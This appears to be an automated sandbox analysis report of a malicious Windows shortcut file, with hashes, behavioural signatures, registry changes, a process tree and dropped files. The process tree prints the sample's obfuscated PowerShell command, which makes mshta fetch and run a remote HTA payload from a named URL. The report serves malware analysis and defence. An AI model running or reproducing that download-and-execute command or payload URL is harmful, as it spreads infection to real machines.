Analysis
max time kernel: 137s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-05-2024 02:13

Static task: static1
Behavioral task: behavioral1
Sample: eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
Resource: win7-20240221-en
General
Target: eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
Size: 1KB
MD5: 27251cc401cfe955c65b5512b5684f8b
SHA1: 80c817b04ae8a395d8f078bbf4e117895c13e6bd
SHA256: eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765
SHA512: c1ab81ca147a45d1d60008d3b1edb610552ebd60202a0f791352a139512fdae276b916c438254b48d72105ae061d98346f55c3c92866aa45c28483ca37f1717b
Malware Config
Extracted URL: https://foundationforwomenshealth.com/swim.hta
Signatures

Blocklisted process makes network request (3 IoCs)
Processes:
  flow | pid | process
  9 | 2152 | mshta.exe
  12 | 2152 | mshta.exe
  15 | 2152 | mshta.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | cmd.exe

Checks whether UAC is enabled
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | mshta.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1D609180-18AA-11EF-9519-62BC6A84A035} = "0" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4055929879" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423195413" | iexplore.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4055929879" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108278" | IEXPLORE.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\GPU | IEXPLORE.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4061711362" | IEXPLORE.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31108278" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108278" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | IEXPLORE.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid | process
  8 | powershell.exe
  8 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 8 | powershell.exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
  pid | process
  4352 | iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
Processes:
  pid | process
  4352 | iexplore.exe
  4352 | iexplore.exe
  3244 | IEXPLORE.EXE
  3244 | IEXPLORE.EXE
  4524 | IEXPLORE.EXE
  4524 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description | pid | process | target process
  PID 4376 wrote to memory of 8 | 4376 | cmd.exe | powershell.exe
  PID 4376 wrote to memory of 8 | 4376 | cmd.exe | powershell.exe
  PID 8 wrote to memory of 2152 | 8 | powershell.exe | mshta.exe
  PID 8 wrote to memory of 2152 | 8 | powershell.exe | mshta.exe
  PID 4352 wrote to memory of 3244 | 4352 | iexplore.exe | IEXPLORE.EXE
  PID 4352 wrote to memory of 3244 | 4352 | iexplore.exe | IEXPLORE.EXE
  PID 4352 wrote to memory of 3244 | 4352 | iexplore.exe | IEXPLORE.EXE
  PID 4352 wrote to memory of 4524 | 4352 | iexplore.exe | IEXPLORE.EXE
  PID 4352 wrote to memory of 4524 | 4352 | iexplore.exe | IEXPLORE.EXE
  PID 4352 wrote to memory of 4524 | 4352 | iexplore.exe | IEXPLORE.EXE
Processes (indentation shows the parent/child relationship)

C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/swim.hta'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://foundationforwomenshealth.com/swim.hta
      - Blocklisted process makes network request
      - Checks whether UAC is enabled

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
  "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4352 CREDAT:17410 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx

  C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4352 CREDAT:82946 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
  Filesize: 717B
  MD5: 822467b728b7a66b081c91795373789a
  SHA1: d8f2f02e1eef62485a9feffd59ce837511749865
  SHA256: af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
  SHA512: bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\706CA7D6DBAE891CDEA570A00B8F615A
  Filesize: 503B
  MD5: 4ca3c20cf0350948d78034ae05f7214a
  SHA1: 7e22661b0cfff067f0214fd592146dd7e235e6af
  SHA256: 310d57e27b68292969aad3acad17d241e9f6dd7d0d289cea4d501dc73a0309f7
  SHA512: 3d3a5534bc16b1796a4b9656369b0511283501d3474f7ede8b1249f7064ba10f012f6143b1d51776c54abb83a1a09c6b0cd1c0be4f6e1a1a3f51d251cf9c52f8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  Filesize: 471B
  MD5: 01409a92b179c99711ea8c28d307d0c4
  SHA1: a9cc2b0c5727e2af14819f3908c4693f8e891392
  SHA256: 3034962a4c308ef5e66a2de7faf1ed2439b7e59086a8c07ad59ce3669b8ee01c
  SHA512: 8e86173a54d253f3e05443c603222b9018d63a3fb8e3a26b2b5602c083c07b117d5c53ede08056b6aa4503380562444c6704de32b2cce76f146478616b7278c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
  Filesize: 192B
  MD5: d6e19eae69b45d6abe5fbc7b6f6bf228
  SHA1: 478d9c791a59e90ffd2e9cfb9c147b778ba6201e
  SHA256: f9f6c356c6b81243a68ba680f23fc44eb66f21eb3472d06f47324a75d712350b
  SHA512: 5ce8ca6e156a19addafb5173672912fb28aa177008c04a61a9620bdaf2d132fbee2a04723d59c8e47d8e4baf7b2c68ec4345d1acb34aca79db916796e774634a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\706CA7D6DBAE891CDEA570A00B8F615A
  Filesize: 552B
  MD5: af1f42bf68eb66ff0d7afbb218ff8e9f
  SHA1: 6671d9d62fe422a8dac478cafe8671b249906ea7
  SHA256: d2b6bb30d6ce063bfde8953944f8d14e9643f9b2305307a746d99ff27515325c
  SHA512: b2aae34dcb3f5eaeee39f67bbb833eb3e37d8e4173c5989578cc67ce7d7ab11693464d61bfe6cbc4105885b7915a33757efb046a9923273cb9e4a3d8ec310330

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  Filesize: 404B
  MD5: 19c3bd6b27dc6dcf11dabdcd3ca93104
  SHA1: e7041106522d5845f96323ab6badf1abde20ab62
  SHA256: 1682efd8fa30a1e2ca0313223900db2a83f7a9d1441a70e61298580e80274761
  SHA512: 9b3214d988b6a1ed871af7d1473fa66cf73eda0705e3d544f4ddbf58be4fe31b652b4147f8462ddaf4fad5a12419fa8e1c4228f4a1ca4380bfac26164f9f7d70

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2IX84YPE\suggestions[1].en-US
  Filesize: 17KB
  MD5: 5a34cb996293fde2cb7a4ac89587393a
  SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
  SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
  SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gdazehi.vph.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/8-17-0x00007FF917AA0000-0x00007FF918561000-memory.dmp
  Filesize: 10.8MB

memory/8-16-0x00007FF917AA0000-0x00007FF918561000-memory.dmp
  Filesize: 10.8MB

memory/8-13-0x00007FF917AA0000-0x00007FF918561000-memory.dmp
  Filesize: 10.8MB

memory/8-12-0x000001F423D60000-0x000001F423D82000-memory.dmp
  Filesize: 136KB

memory/8-2-0x00007FF917AA3000-0x00007FF917AA5000-memory.dmp
  Filesize: 8KB